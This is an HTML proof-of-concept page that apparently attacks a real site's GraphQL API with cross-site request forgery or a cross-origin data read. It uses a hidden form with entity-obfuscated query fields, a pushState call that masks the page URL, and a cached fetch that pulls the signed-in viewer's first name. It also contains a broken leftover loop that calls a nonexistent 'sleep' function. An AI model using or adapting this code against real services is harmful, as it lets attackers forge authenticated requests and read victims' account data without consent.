<html>
  
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.skillshare.com/api/graphql">
      <input type="hidden" name="query" value="&#x71;&#x75;&#x65;&#x72;&#x79;&#x25;&#x32;&#x30;&#x76;&#x69;&#x65;&#x77;&#x65;&#x72;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x78;&#x74;&#x28;&#x24;&#x69;&#x73;&#x41;&#x75;&#x74;&#x68;&#x65;&#x6e;&#x74;&#x69;&#x63;&#x61;&#x74;&#x65;&#x64;&#x3a;&#x25;&#x32;&#x30;&#x42;&#x6f;&#x6f;&#x6c;&#x65;&#x61;&#x6e;&#x21;&#x29;&#x25;&#x32;&#x30;&#x7b;&#x25;&#x32;&#x30;&#x76;&#x69;&#x65;&#x77;&#x65;&#x72;&#x25;&#x32;&#x30;&#x40;&#x69;&#x6e;&#x63;&#x6c;&#x75;&#x64;&#x65;&#x28;&#x69;&#x66;&#x3a;&#x25;&#x32;&#x30;&#x24;&#x69;&#x73;&#x41;&#x75;&#x74;&#x68;&#x65;&#x6e;&#x74;&#x69;&#x63;&#x61;&#x74;&#x65;&#x64;&#x29;&#x25;&#x32;&#x30;&#x7b;&#x25;&#x32;&#x30;&#x66;&#x69;&#x72;&#x73;&#x74;&#x4e;&#x61;&#x6d;&#x65;&#x25;&#x32;&#x30;&#x7d;&#x25;&#x32;&#x30;&#x7d;" />
      <input type="hidden" name="variables" value="&#x7b;&#x25;&#x32;&#x32;&#x69;&#x73;&#x41;&#x75;&#x74;&#x68;&#x65;&#x6e;&#x74;&#x69;&#x63;&#x61;&#x74;&#x65;&#x64;&#x25;&#x32;&#x32;&#x3a;&#x74;&#x72;&#x75;&#x65;&#x7d;" />
      <input type="submit" value="Submit request" />
    </form>
  
        <script type="text/javascript">
         for (var i = 1; i <= 5; i++) {
             document.write(i);
             sleep(2); //for the first time loop is excute and sleep for 2 seconds        
         };
      </script>
  
  
<script>  
var url = "https://www.skillshare.com/api/graphql?query=query%20viewerContext($isAuthenticated:%20Boolean!)%20{%20viewer%20@include(if:%20$isAuthenticated)%20{%20firstName%20}%20}&variables={%22isAuthenticated%22:true}";  
fetch(url, {    
    method: 'GET',    
    cache: 'force-cache'
    })
.then(response => response.json())
.then(data => console.log(data));
</script>


</html>
